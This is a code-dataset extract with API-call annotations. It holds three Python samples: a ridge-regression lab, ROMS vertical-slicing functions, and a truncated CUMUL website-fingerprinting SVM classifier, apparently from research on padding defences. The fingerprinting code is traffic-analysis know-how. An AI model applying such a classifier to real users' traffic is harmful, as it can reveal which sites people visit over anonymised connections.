code
stringlengths 31
1.05M
| apis
list | extract_api
stringlengths 97
1.91M
|
---|---|---|
# Useful starting lines
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
# %load_ext autoreload
# %autoreload 2
from sklearn import linear_model
# from __future__ import absolute_import
from labs.ex03.template import helpers
from labs.ex04.template.costs import compute_rmse, compute_mse
from labs.ex04.template.costs import compute_mse_for_ridge
from labs.ex04.template.ridge_regression import ridge_regression
from labs.ex04.template.build_polynomial import build_poly
from labs.ex04.template.plots import cross_validation_visualization
from labs.ex04.template.plots import cross_validation_visualization_for_degree
from labs.ex04.template.least_squares import least_squares
from labs.ex04.template.split_data import split_data
from labs.ex04.template.plots import bias_variance_decomposition_visualization
# load dataset
def data_load():
''' Return x, y '''
return helpers.load_data()
def build_k_indices(y, k_fold, seed):
"""build k indices for k-fold."""
num_row = y.shape[0]
interval = int(num_row / k_fold)
np.random.seed(seed)
indices = np.random.permutation(num_row)
k_indices = [indices[k * interval: (k + 1) * interval]
for k in range(k_fold)]
return np.array(k_indices)
def cross_validation(y, x, k_indices, k, lamb, degree, rmse=False):
"""return the loss of ridge regression."""
# ***************************************************
# Split data into K groups according to indices
# get k'th subgroup in test, others in train:
# ***************************************************
x = np.array(x)
y = np.array(y)
train_ind = np.concatenate((k_indices[:k], k_indices[k+1:]), axis=0)
train_ind = np.reshape(train_ind, (train_ind.size,))
test_ind = k_indices[k]
# Note: different from np.ndarray, tuple is name[index,]
# ndarray is name[index,:]
train_x = x[train_ind,]
train_y = y[train_ind,]
test_x = x[test_ind,]
test_y = y[test_ind,]
# ***************************************************
# INSERT YOUR CODE HERE
# form data with polynomial degree:
# ***************************************************
train_x = build_poly(train_x, degree)
test_x = build_poly(test_x, degree)
# ***************************************************
# INSERT YOUR CODE HERE
# ridge regression:
# ***************************************************
loss_tr, weight = ridge_regression(train_y, train_x, lamb)
# Test with sklearn ridge solve.
clf = linear_model.ridge_regression(train_x, train_y, alpha=lamb)
# weight = clf
# ***************************************************
# INSERT YOUR CODE HERE
# calculate the loss for train and test data: TODO
# ***************************************************
''' Compute MSE by ridge weights '''
loss_tr = compute_mse_for_ridge(train_y, train_x, weight,lamb)
loss_te = compute_mse_for_ridge(test_y, test_x, weight, lamb)
# loss_tr = compute_mse(train_y, train_x, weight)
# loss_te = compute_mse(test_y, test_x, weight)
if rmse is True:
loss_tr = compute_rmse(loss_tr)
loss_te = compute_rmse(loss_te)
return loss_tr, loss_te
def cross_validation_demo():
seed = 1
degree = 7
k_fold = 4
lambdas = np.logspace(-4, 2, 30)
y,x = data_load()
# split data in k fold
k_indices = build_k_indices(y, k_fold, seed)
# define lists to store the loss of training data and test data
mse_tr = []
mse_te = []
# ***************************************************
# INSERT YOUR CODE HERE
# cross validation:
# ***************************************************
for lamb in lambdas:
_mse_tr = []
_mse_te = []
for k in range(k_fold):
loss_tr, loss_te = cross_validation(y,x,k_indices,k,lamb,degree, rmse=True)
_mse_tr += [loss_tr]
_mse_te += [loss_te]
avg_tr = np.average(_mse_tr)
avg_te = np.average(_mse_te)
mse_tr += [avg_tr]
mse_te += [avg_te]
cross_validation_visualization(lambdas, mse_tr, mse_te)
print(mse_tr, mse_te)
def cross_validation_demo_degree():
seed = 1
degrees = range(2,11)
k_fold = 4
lamb = 0.5
y,x = data_load()
# split data in k fold
k_indices = build_k_indices(y, k_fold, seed)
# define lists to store the loss of training data and test data
mse_tr = []
mse_te = []
# ***************************************************
# INSERT YOUR CODE HERE
# cross validation:
# ***************************************************
for degree in degrees:
_mse_tr = []
_mse_te = []
for k in range(k_fold):
loss_tr, loss_te = cross_validation(y,x,k_indices,k,lamb, degree, rmse=True)
_mse_tr += [loss_tr]
_mse_te += [loss_te]
avg_tr = np.average(_mse_tr)
avg_te = np.average(_mse_te)
mse_tr += [avg_tr]
mse_te += [avg_te]
cross_validation_visualization_for_degree(degrees, mse_tr, mse_te)
print(mse_tr, mse_te)
def bias_variance2(y, x, weight, variance_e):
'''
For linear model bias-variance calculation. The dimension is len(weight)
:param y:
:param x:
:param weight: beta of linear model
:param function:
:param variance_e:
:return:
'''
# N = len(x)
# res = np.dot(x, weight)
# error = variance_e * (len(weight) / N) + np.sum( (y - np.dot(x, weight)) **2 )/ N
# return compute_rmse(error)
return compute_rmse(compute_mse(y,x,weight) + 1 + len(weight)/ len(x))
def bias_variance(function, x, weight, variance_e):
'''
For linear model bias-variance calculation. The dimension is len(weight)
:param y:
:param x:
:param weight: beta of linear model
:param function:
:param variance_e:
:return:
'''
y = function(x[:,1])
# N = len(x)
# res = np.dot(x, weight)
# error = variance_e * (len(weight) / N) + np.sum( (y - np.dot(x, weight)) **2 )/ N
# return compute_rmse(error)
return compute_rmse(compute_mse(y,x,weight))
def bias_variance_demo():
"""The entry."""
# define parameters
seeds = range(100)
num_data = 10000
ratio_train = 0.005
degrees = range(1, 10)
# define list to store the variable
rmse_tr = np.empty((len(seeds), len(degrees)))
rmse_te = np.empty((len(seeds), len(degrees)))
for index_seed, seed in enumerate(seeds):
np.random.seed(seed)
x = np.linspace(0.1, 2 * np.pi, num_data)
y = np.sin(x) + 0.3 * np.random.randn(num_data).T
# ***************************************************
# INSERT YOUR CODE HERE
# split data with a specific seed: TODO
# ***************************************************
train_x, train_y, test_x, test_y = split_data(x,y,ratio_train,seed)
# ***************************************************
# INSERT YOUR CODE HERE
# bias_variance_decomposition: TODO
# ***************************************************
for ind_degree, degree in enumerate(degrees):
# Use least square
x_tr = build_poly(train_x, degree)
x_te = build_poly(test_x, degree)
mse, weight = least_squares(train_y, x_tr)
rmse_tr[index_seed][ind_degree] = bias_variance(np.sin, x_tr, weight, 1)
rmse_te[index_seed][ind_degree] = bias_variance(np.sin, x_te, weight, 1)
# rmse_tr[index_seed][ind_degree] = bias_variance2(train_y, x_tr, weight, 1)
# rmse_te[index_seed][ind_degree] = bias_variance2(test_y, x_te, weight, 1)
bias_variance_decomposition_visualization(degrees, rmse_tr, rmse_te)
# cross_validation_demo()
# degree = 5.
# cross_validation_demo_degree()
bias_variance_demo()
print()
|
[
"numpy.random.seed",
"numpy.logspace",
"labs.ex04.template.plots.cross_validation_visualization_for_degree",
"labs.ex04.template.costs.compute_mse_for_ridge",
"numpy.sin",
"labs.ex04.template.plots.bias_variance_decomposition_visualization",
"labs.ex04.template.ridge_regression.ridge_regression",
"labs.ex04.template.split_data.split_data",
"numpy.random.randn",
"numpy.reshape",
"numpy.linspace",
"numpy.average",
"labs.ex04.template.plots.cross_validation_visualization",
"labs.ex04.template.build_polynomial.build_poly",
"labs.ex03.template.helpers.load_data",
"numpy.random.permutation",
"labs.ex04.template.costs.compute_rmse",
"numpy.concatenate",
"labs.ex04.template.least_squares.least_squares",
"labs.ex04.template.costs.compute_mse",
"numpy.array",
"sklearn.linear_model.ridge_regression"
] |
[((904, 923), 'labs.ex03.template.helpers.load_data', 'helpers.load_data', ([], {}), '()\n', (921, 923), False, 'from labs.ex03.template import helpers\n'), ((1067, 1087), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1081, 1087), True, 'import numpy as np\n'), ((1102, 1132), 'numpy.random.permutation', 'np.random.permutation', (['num_row'], {}), '(num_row)\n', (1123, 1132), True, 'import numpy as np\n'), ((1244, 1263), 'numpy.array', 'np.array', (['k_indices'], {}), '(k_indices)\n', (1252, 1263), True, 'import numpy as np\n'), ((1606, 1617), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (1614, 1617), True, 'import numpy as np\n'), ((1626, 1637), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (1634, 1637), True, 'import numpy as np\n'), ((1655, 1713), 'numpy.concatenate', 'np.concatenate', (['(k_indices[:k], k_indices[k + 1:])'], {'axis': '(0)'}), '((k_indices[:k], k_indices[k + 1:]), axis=0)\n', (1669, 1713), True, 'import numpy as np\n'), ((1728, 1768), 'numpy.reshape', 'np.reshape', (['train_ind', '(train_ind.size,)'], {}), '(train_ind, (train_ind.size,))\n', (1738, 1768), True, 'import numpy as np\n'), ((2197, 2224), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['train_x', 'degree'], {}), '(train_x, degree)\n', (2207, 2224), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((2238, 2264), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['test_x', 'degree'], {}), '(test_x, degree)\n', (2248, 2264), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((2456, 2496), 'labs.ex04.template.ridge_regression.ridge_regression', 'ridge_regression', (['train_y', 'train_x', 'lamb'], {}), '(train_y, train_x, lamb)\n', (2472, 2496), False, 'from labs.ex04.template.ridge_regression import ridge_regression\n'), ((2545, 2604), 'sklearn.linear_model.ridge_regression', 'linear_model.ridge_regression', (['train_x', 'train_y'], {'alpha': 'lamb'}), '(train_x, train_y, alpha=lamb)\n', (2574, 2604), False, 'from sklearn import linear_model\n'), ((2879, 2932), 'labs.ex04.template.costs.compute_mse_for_ridge', 'compute_mse_for_ridge', (['train_y', 'train_x', 'weight', 'lamb'], {}), '(train_y, train_x, weight, lamb)\n', (2900, 2932), False, 'from labs.ex04.template.costs import compute_mse_for_ridge\n'), ((2946, 2997), 'labs.ex04.template.costs.compute_mse_for_ridge', 'compute_mse_for_ridge', (['test_y', 'test_x', 'weight', 'lamb'], {}), '(test_y, test_x, weight, lamb)\n', (2967, 2997), False, 'from labs.ex04.template.costs import compute_mse_for_ridge\n'), ((3321, 3343), 'numpy.logspace', 'np.logspace', (['(-4)', '(2)', '(30)'], {}), '(-4, 2, 30)\n', (3332, 3343), True, 'import numpy as np\n'), ((4096, 4151), 'labs.ex04.template.plots.cross_validation_visualization', 'cross_validation_visualization', (['lambdas', 'mse_tr', 'mse_te'], {}), '(lambdas, mse_tr, mse_te)\n', (4126, 4151), False, 'from labs.ex04.template.plots import cross_validation_visualization\n'), ((5039, 5105), 'labs.ex04.template.plots.cross_validation_visualization_for_degree', 'cross_validation_visualization_for_degree', (['degrees', 'mse_tr', 'mse_te'], {}), '(degrees, mse_tr, mse_te)\n', (5080, 5105), False, 'from labs.ex04.template.plots import cross_validation_visualization_for_degree\n'), ((7713, 7781), 'labs.ex04.template.plots.bias_variance_decomposition_visualization', 'bias_variance_decomposition_visualization', (['degrees', 'rmse_tr', 'rmse_te'], {}), '(degrees, rmse_tr, rmse_te)\n', (7754, 7781), False, 'from labs.ex04.template.plots import bias_variance_decomposition_visualization\n'), ((3144, 3165), 'labs.ex04.template.costs.compute_rmse', 'compute_rmse', (['loss_tr'], {}), '(loss_tr)\n', (3156, 3165), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((3184, 3205), 'labs.ex04.template.costs.compute_rmse', 'compute_rmse', (['loss_te'], {}), '(loss_te)\n', (3196, 3205), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((3980, 3999), 'numpy.average', 'np.average', (['_mse_tr'], {}), '(_mse_tr)\n', (3990, 3999), True, 'import numpy as np\n'), ((4017, 4036), 'numpy.average', 'np.average', (['_mse_te'], {}), '(_mse_te)\n', (4027, 4036), True, 'import numpy as np\n'), ((4923, 4942), 'numpy.average', 'np.average', (['_mse_tr'], {}), '(_mse_tr)\n', (4933, 4942), True, 'import numpy as np\n'), ((4960, 4979), 'numpy.average', 'np.average', (['_mse_te'], {}), '(_mse_te)\n', (4970, 4979), True, 'import numpy as np\n'), ((6129, 6154), 'labs.ex04.template.costs.compute_mse', 'compute_mse', (['y', 'x', 'weight'], {}), '(y, x, weight)\n', (6140, 6154), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((6519, 6539), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (6533, 6539), True, 'import numpy as np\n'), ((6552, 6589), 'numpy.linspace', 'np.linspace', (['(0.1)', '(2 * np.pi)', 'num_data'], {}), '(0.1, 2 * np.pi, num_data)\n', (6563, 6589), True, 'import numpy as np\n'), ((6895, 6930), 'labs.ex04.template.split_data.split_data', 'split_data', (['x', 'y', 'ratio_train', 'seed'], {}), '(x, y, ratio_train, seed)\n', (6905, 6930), False, 'from labs.ex04.template.split_data import split_data\n'), ((6602, 6611), 'numpy.sin', 'np.sin', (['x'], {}), '(x)\n', (6608, 6611), True, 'import numpy as np\n'), ((7232, 7259), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['train_x', 'degree'], {}), '(train_x, degree)\n', (7242, 7259), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((7279, 7305), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['test_x', 'degree'], {}), '(test_x, degree)\n', (7289, 7305), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((7332, 7360), 'labs.ex04.template.least_squares.least_squares', 'least_squares', (['train_y', 'x_tr'], {}), '(train_y, x_tr)\n', (7345, 7360), False, 'from labs.ex04.template.least_squares import least_squares\n'), ((5589, 5614), 'labs.ex04.template.costs.compute_mse', 'compute_mse', (['y', 'x', 'weight'], {}), '(y, x, weight)\n', (5600, 5614), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((6620, 6645), 'numpy.random.randn', 'np.random.randn', (['num_data'], {}), '(num_data)\n', (6635, 6645), True, 'import numpy as np\n')]
|
"""Vertical structure functions for ROMS
:func:`sdepth`
Depth of s-levels
:func:`zslice`
Slice a 3D field in s-coordinates to fixed depth
:func:`multi_zslice`
Slice a 3D field to several depth levels
:func:`z_average`
Vertical average of a 3D field
:func:`s_stretch`
Compute vertical stretching arrays Cs_r or Cs_w
"""
# -----------------------------------
# <NAME> <<EMAIL>>
# Institute of Marine Research
# Bergen, Norway
# 2010-09-30
# -----------------------------------
from typing import Union, List
import numpy as np
import xarray as xr
Surface = Union[float, np.ndarray] # Surface z = ....
def sdepth(H, Hc, C, stagger="rho", Vtransform=1):
"""Depth of s-levels
*H* : arraylike
Bottom depths [meter, positive]
*Hc* : scalar
Critical depth
*cs_r* : 1D array
s-level stretching curve
*stagger* : [ 'rho' | 'w' ]
*Vtransform* : [ 1 | 2 ]
defines the transform used, defaults 1 = Song-Haidvogel
Returns an array with ndim = H.ndim + 1 and
shape = cs_r.shape + H.shape with the depths of the
mid-points in the s-levels.
Typical usage::
>>> fid = Dataset(roms_file)
>>> H = fid.variables['h'][:, :]
>>> C = fid.variables['Cs_r'][:]
>>> Hc = fid.variables['hc'].getValue()
>>> z_rho = sdepth(H, Hc, C)
"""
H = np.asarray(H)
Hshape = H.shape # Save the shape of H
H = H.ravel() # and make H 1D for easy shape maniplation
C = np.asarray(C)
N = len(C)
outshape = (N,) + Hshape # Shape of output
if stagger == "rho":
S = -1.0 + (0.5 + np.arange(N)) / N # Unstretched coordinates
elif stagger == "w":
S = np.linspace(-1.0, 0.0, N)
else:
raise ValueError("stagger must be 'rho' or 'w'")
if Vtransform == 1: # Default transform by Song and Haidvogel
A = Hc * (S - C)[:, None]
B = np.outer(C, H)
return (A + B).reshape(outshape)
elif Vtransform == 2: # New transform by Shchepetkin
N = Hc * S[:, None] + np.outer(C, H)
D = 1.0 + Hc / H
return (N / D).reshape(outshape)
else:
raise ValueError("Unknown Vtransform")
# ------------------------------------
def sdepth_w(H, Hc, cs_w):
"""Return depth of w-points in s-levels
Kept for backwards compatibility
use *sdepth(H, Hc, cs_w, stagger='w')* instead
"""
return sdepth(H, Hc, cs_w, stagger="w")
# ------------------------------------------
# Vertical slicing e.t.c.
# ------------------------------------------
def zslice2(F, S, z):
"""Vertical slice of a 3D ROMS field
Vertical interpolation of a field in s-coordinates to
(possibly varying) depth level
*F* : array with vertical profiles, first dimension is vertical
*S* : array with depths of the F-values,
*z* : Depth level(s) for output, scalar or ``shape = F.shape[1:]``
The z values should be negative
Return value : array, `shape = F.shape[1:]`, the vertical slice
Example:
H is an array of depths (positive values)
Hc is the critical depth
C is 1D containing the s-coordinate stretching at rho-points
returns F50, interpolated values at 50 meter with F50.shape = H.shape
>>> z_rho = sdepth(H, Hc, C)
>>> F50 = zslice(F, z_rho, -50.0)
"""
# TODO:
# Option to Save A, D, Dm
# => faster interpolate more fields to same depth
F = np.asarray(F)
S = np.asarray(S)
z = np.asarray(z, dtype="float")
Fshape = F.shape # Save original shape
if S.shape != Fshape:
raise ValueError("F and z_r must have same shape")
if z.shape and z.shape != Fshape[1:]:
raise ValueError("z must be scalar or have shape = F.shape[1:]")
# Flatten all non-vertical dimensions
N = F.shape[0] # Length of vertical dimension
M = F.size // N # Combined length of horizontal dimension(s)
F = F.reshape((N, M))
S = S.reshape((N, M))
if z.shape:
z = z.reshape((M,))
# Find integer array C with shape (M,)
# with S[C[i]-1, i] < z <= S[C[i], i]
# C = np.apply_along_axis(np.searchsorted, 0, S, z)
# but the following is much faster
C = np.sum(S < z, axis=0)
C = C.clip(1, N - 1)
# For vectorization
# construct index array tuples D and Dm such that
# F[D][i] = F[C[i], i]
# F[Dm][i] = F[C[i]-1, i]
I = np.arange(M, dtype="int")
D = (C, I)
Dm = (C - 1, I)
# Compute interpolation weights
A = (z - S[Dm]) / (S[D] - S[Dm])
A = A.clip(0.0, 1.0) # Control the extrapolation
# Do the linear interpolation
R = (1 - A) * F[Dm] + A * F[D]
# Give the result the correct s
R = R.reshape(Fshape[1:])
return R
# -----------------------------------------------
def s_stretch(N, theta_s, theta_b, stagger="rho", Vstretching=1):
"""Compute a s-level stretching array
*N* : Number of vertical levels
*theta_s* : Surface stretching factor
*theta_b* : Bottom stretching factor
*stagger* : "rho"|"w"
*Vstretching* : 1|2|4
"""
if stagger == "rho":
S = -1.0 + (0.5 + np.arange(N)) / N
elif stagger == "w":
S = np.linspace(-1.0, 0.0, N + 1)
else:
raise ValueError("stagger must be 'rho' or 'w'")
if Vstretching == 1:
cff1 = 1.0 / np.sinh(theta_s)
cff2 = 0.5 / np.tanh(0.5 * theta_s)
return (1.0 - theta_b) * cff1 * np.sinh(theta_s * S) + theta_b * (
cff2 * np.tanh(theta_s * (S + 0.5)) - 0.5
)
elif Vstretching == 2:
a, b = 1.0, 1.0
Csur = (1 - np.cosh(theta_s * S)) / (np.cosh(theta_s) - 1)
Cbot = np.sinh(theta_b * (S + 1)) / np.sinh(theta_b) - 1
mu = (S + 1) ** a * (1 + (a / b) * (1 - (S + 1) ** b))
return mu * Csur + (1 - mu) * Cbot
elif Vstretching == 4:
C = (1 - np.cosh(theta_s * S)) / (np.cosh(theta_s) - 1)
C = (np.exp(theta_b * C) - 1) / (1 - np.exp(-theta_b))
return C
elif Vstretching == 5:
if stagger == "w":
K = np.arange(N + 1)
if stagger == "rho":
K = np.arange(0.5, N + 1)
S1 = -(K * K - 2 * K * N + K + N * N - N) / (N * N - N)
S2 = -0.01 * (K * K - K * N) / (1 - N)
S = S1 + S2
C = (1 - np.cosh(theta_s * S)) / (np.cosh(theta_s) - 1)
C = (np.exp(theta_b * C) - 1) / (1 - np.exp(-theta_b))
else:
raise ValueError("Unknown Vstretching")
def invert_s(F: xr.DataArray, value: Surface):
"""Return highest (shallowest) s-value such that F(s,...) = value
F = DataArray with z_rho as coordinate
The vertical dimension in F must be first, axis=0
F must not have a time dimension
Returns D, Dm, a
F[Dm] <= value <= F[D] (or opposite inequalities)
and a is the interpolation weight:
value = (1-a)*F(K-1) + a*F(K)
a = nan if this is not possible
"""
val = value
# Work on numpy arrays
F0 = F.values
# z_rho = F.z_rho.values
# s_rho = F.s_rho.values
val = np.asarray(val, dtype="float")
# Fshape = F.shape # Save original shape
# if val.shape and val.shape != Fshape[1:]:
# raise ValueError("z must be scalar or have shape = F.shape[1:]")
# Flatten all non-vertical dimensions
N = F.shape[0] # Length of vertical dimension
M = F0.size // N # Combined length of horizontal dimensions
F0 = F0.reshape((N, M))
if val.shape: # Value may be space dependent
val = val.reshape((M,))
# Look for highest s-value where G is negative
G = (F0[1:, :] - val) * (F0[:-1, :] - val)
G = G[::-1, :] # Reverse
K = N - 1 - (G <= 0).argmax(axis=0)
# Define D such that F[D][i] = F[K[i], i]
I = np.arange(M)
D = (K, I)
Dm = (K - 1, I)
# Compute interpolation weights
a = (val - F0[Dm]) / (F0[D] - F0[Dm] + 1e-30)
# Only use 0 <= a <= 1
a[np.abs(a - 0.5) > 0.5] = np.nan #
return D, Dm, a
class HorizontalSlicer:
"""Reduce to horizontal view by slicing
F = DataArray, time-independent, first dimension is vertical
value = slice value
If F is not monotonous, returns the shallowest depth where F = value
"""
def __init__(self, F: xr.DataArray, value: Surface) -> None:
self.D, self.Dm, self.a = invert_s(F, value)
self.M = len(self.a)
# self.dims = F.dims
def __call__(self, G: xr.DataArray) -> xr.DataArray:
"""G must have same vertical and horizontal dimensions as F"""
if "ocean_time" in G.dims:
ntimes = G.shape[0]
kmax = G.shape[1]
R: List[np.ndarray] = []
for t in range(ntimes):
G0 = G.isel(ocean_time=t).values
G0 = G0.reshape((kmax, self.M))
R0 = (1 - self.a) * G0[self.Dm] + self.a * G0[self.D]
R0 = R0.reshape(G.shape[2:])
R.append(R0)
R1 = np.array(R)
else:
kmax = G.shape[0]
G0 = G.values
G0 = G0.reshape((kmax, self.M))
R1 = (1 - self.a) * G0[self.Dm] + self.a * G0[self.D]
R1 = R1.reshape(G.shape[1:])
# Return a DataArray
# Should have something on z_rho?
dims = list(G.dims)
dims.remove("s_rho")
coords = {dim: G.coords[dim] for dim in dims}
coords["lon_rho"] = G.coords["lon_rho"]
coords["lat_rho"] = G.coords["lat_rho"]
return xr.DataArray(R1, dims=dims, coords=coords, attrs=G.attrs)
|
[
"numpy.outer",
"numpy.sum",
"numpy.tanh",
"numpy.abs",
"numpy.asarray",
"numpy.arange",
"xarray.DataArray",
"numpy.linspace",
"numpy.array",
"numpy.cosh",
"numpy.exp",
"numpy.sinh"
] |
[((1334, 1347), 'numpy.asarray', 'np.asarray', (['H'], {}), '(H)\n', (1344, 1347), True, 'import numpy as np\n'), ((1462, 1475), 'numpy.asarray', 'np.asarray', (['C'], {}), '(C)\n', (1472, 1475), True, 'import numpy as np\n'), ((3411, 3424), 'numpy.asarray', 'np.asarray', (['F'], {}), '(F)\n', (3421, 3424), True, 'import numpy as np\n'), ((3433, 3446), 'numpy.asarray', 'np.asarray', (['S'], {}), '(S)\n', (3443, 3446), True, 'import numpy as np\n'), ((3455, 3483), 'numpy.asarray', 'np.asarray', (['z'], {'dtype': '"""float"""'}), "(z, dtype='float')\n", (3465, 3483), True, 'import numpy as np\n'), ((4173, 4194), 'numpy.sum', 'np.sum', (['(S < z)'], {'axis': '(0)'}), '(S < z, axis=0)\n', (4179, 4194), True, 'import numpy as np\n'), ((4369, 4394), 'numpy.arange', 'np.arange', (['M'], {'dtype': '"""int"""'}), "(M, dtype='int')\n", (4378, 4394), True, 'import numpy as np\n'), ((7020, 7050), 'numpy.asarray', 'np.asarray', (['val'], {'dtype': '"""float"""'}), "(val, dtype='float')\n", (7030, 7050), True, 'import numpy as np\n'), ((7713, 7725), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (7722, 7725), True, 'import numpy as np\n'), ((1879, 1893), 'numpy.outer', 'np.outer', (['C', 'H'], {}), '(C, H)\n', (1887, 1893), True, 'import numpy as np\n'), ((9444, 9501), 'xarray.DataArray', 'xr.DataArray', (['R1'], {'dims': 'dims', 'coords': 'coords', 'attrs': 'G.attrs'}), '(R1, dims=dims, coords=coords, attrs=G.attrs)\n', (9456, 9501), True, 'import xarray as xr\n'), ((1672, 1697), 'numpy.linspace', 'np.linspace', (['(-1.0)', '(0.0)', 'N'], {}), '(-1.0, 0.0, N)\n', (1683, 1697), True, 'import numpy as np\n'), ((5163, 5192), 'numpy.linspace', 'np.linspace', (['(-1.0)', '(0.0)', '(N + 1)'], {}), '(-1.0, 0.0, N + 1)\n', (5174, 5192), True, 'import numpy as np\n'), ((5307, 5323), 'numpy.sinh', 'np.sinh', (['theta_s'], {}), '(theta_s)\n', (5314, 5323), True, 'import numpy as np\n'), ((5345, 5367), 'numpy.tanh', 'np.tanh', (['(0.5 * theta_s)'], {}), '(0.5 * theta_s)\n', (5352, 5367), True, 'import numpy as np\n'), ((7881, 7896), 'numpy.abs', 'np.abs', (['(a - 0.5)'], {}), '(a - 0.5)\n', (7887, 7896), True, 'import numpy as np\n'), ((8916, 8927), 'numpy.array', 'np.array', (['R'], {}), '(R)\n', (8924, 8927), True, 'import numpy as np\n'), ((2024, 2038), 'numpy.outer', 'np.outer', (['C', 'H'], {}), '(C, H)\n', (2032, 2038), True, 'import numpy as np\n'), ((5408, 5428), 'numpy.sinh', 'np.sinh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (5415, 5428), True, 'import numpy as np\n'), ((1590, 1602), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (1599, 1602), True, 'import numpy as np\n'), ((5108, 5120), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (5117, 5120), True, 'import numpy as np\n'), ((5579, 5599), 'numpy.cosh', 'np.cosh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (5586, 5599), True, 'import numpy as np\n'), ((5604, 5620), 'numpy.cosh', 'np.cosh', (['theta_s'], {}), '(theta_s)\n', (5611, 5620), True, 'import numpy as np\n'), ((5641, 5667), 'numpy.sinh', 'np.sinh', (['(theta_b * (S + 1))'], {}), '(theta_b * (S + 1))\n', (5648, 5667), True, 'import numpy as np\n'), ((5670, 5686), 'numpy.sinh', 'np.sinh', (['theta_b'], {}), '(theta_b)\n', (5677, 5686), True, 'import numpy as np\n'), ((5462, 5490), 'numpy.tanh', 'np.tanh', (['(theta_s * (S + 0.5))'], {}), '(theta_s * (S + 0.5))\n', (5469, 5490), True, 'import numpy as np\n'), ((5842, 5862), 'numpy.cosh', 'np.cosh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (5849, 5862), True, 'import numpy as np\n'), ((5867, 5883), 'numpy.cosh', 'np.cosh', (['theta_s'], {}), '(theta_s)\n', (5874, 5883), True, 'import numpy as np\n'), ((5902, 5921), 'numpy.exp', 'np.exp', (['(theta_b * C)'], {}), '(theta_b * C)\n', (5908, 5921), True, 'import numpy as np\n'), ((5934, 5950), 'numpy.exp', 'np.exp', (['(-theta_b)'], {}), '(-theta_b)\n', (5940, 5950), True, 'import numpy as np\n'), ((6040, 6056), 'numpy.arange', 'np.arange', (['(N + 1)'], {}), '(N + 1)\n', (6049, 6056), True, 'import numpy as np\n'), ((6102, 6123), 'numpy.arange', 'np.arange', (['(0.5)', '(N + 1)'], {}), '(0.5, N + 1)\n', (6111, 6123), True, 'import numpy as np\n'), ((6272, 6292), 'numpy.cosh', 'np.cosh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (6279, 6292), True, 'import numpy as np\n'), ((6297, 6313), 'numpy.cosh', 'np.cosh', (['theta_s'], {}), '(theta_s)\n', (6304, 6313), True, 'import numpy as np\n'), ((6332, 6351), 'numpy.exp', 'np.exp', (['(theta_b * C)'], {}), '(theta_b * C)\n', (6338, 6351), True, 'import numpy as np\n'), ((6364, 6380), 'numpy.exp', 'np.exp', (['(-theta_b)'], {}), '(-theta_b)\n', (6370, 6380), True, 'import numpy as np\n')]
|
import numpy as np
import sys
#for calculate the loss
from sklearn.metrics import log_loss
from sklearn.metrics import make_scorer
#import three machine learning models
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedShuffleSplit
#for standardizing the data
from sklearn import preprocessing
from sklearn.model_selection import GridSearchCV
import os
from os import mkdir, listdir
from os.path import join, isdir, dirname
from time import strftime
import constants as ct
import configparser
import argparse
import logging
import random
import pandas
import pickle
import joblib
logger = logging.getLogger('cumul')
random.seed(1123)
np.random.seed(1123)
'''params'''
r = 10
def score_func(ground_truths, predictions):
global MON_SITE_NUM, tps, wps, fps, ps, ns, flag
tp, wp, fp, p, n = 0, 0, 0, 0 ,0
for truth,prediction in zip(ground_truths, predictions):
if truth != MON_SITE_NUM:
p += 1
else:
n += 1
if prediction != MON_SITE_NUM:
if truth == prediction:
tp += 1
else:
if truth != MON_SITE_NUM:
wp += 1
# logger.info('Wrong positive:%d %d'%(truth, prediction))
else:
fp += 1
# logger.info('False positive:%d %d'%(truth, prediction))
# logger.info('%4d %4d %4d %4d %4d'%(tp, wp, fp, p, n))
if flag:
tps += tp
wps += wp
fps += fp
ps += p
ns += n
try:
r_precision = tp*n / (tp*n+wp*n+r*p*fp)
except:
r_precision = 0.0
# logger.info('r-precision:%.4f',r_precision)
# return r_precision
return tp/p
def read_conf(file):
cf = configparser.ConfigParser()
cf.read(file)
return dict(cf['default'])
def parse_arguments():
parser = argparse.ArgumentParser(description='It simulates adaptive padding on a set of web traffic traces.')
parser.add_argument('fp',
metavar='<feature path>',
help='Path to the directory of the extracted features')
parser.add_argument('type',
metavar='<model type>',
help='train a clean or dirty model',
default="None")
parser.add_argument('--log',
type=str,
dest="log",
metavar='<log path>',
default='stdout',
help='path to the log file. It will print to stdout by default.')
# Parse arguments
args = parser.parse_args()
config_logger(args)
return args
def config_logger(args):
# Set file
log_file = sys.stdout
if args.log != 'stdout':
log_file = open(args.log, 'w')
ch = logging.StreamHandler(log_file)
# Set logging format
ch.setFormatter(logging.Formatter(ct.LOG_FORMAT))
logger.addHandler(ch)
# Set level format
logger.setLevel(logging.INFO)
#SVM with RBF kernel for open world!!
def GridSearch(train_X,train_Y):
global OPEN_WORLD
#find the optimal gamma
param_grid = [
{
'C': [2**11,2**13,2**15,2**17],
'gamma' : [2**-3,2**-1,2**1,2**3]
}
]
if OPEN_WORLD:
my_scorer = make_scorer(score_func, greater_is_better=True)
else:
my_scorer = "accuracy"
# clf = GridSearchCV(estimator = SVC(kernel = 'rbf'), param_grid = param_grid, \
# scoring = 'accuracy', cv = 10, verbose = 2, n_jobs = -1)
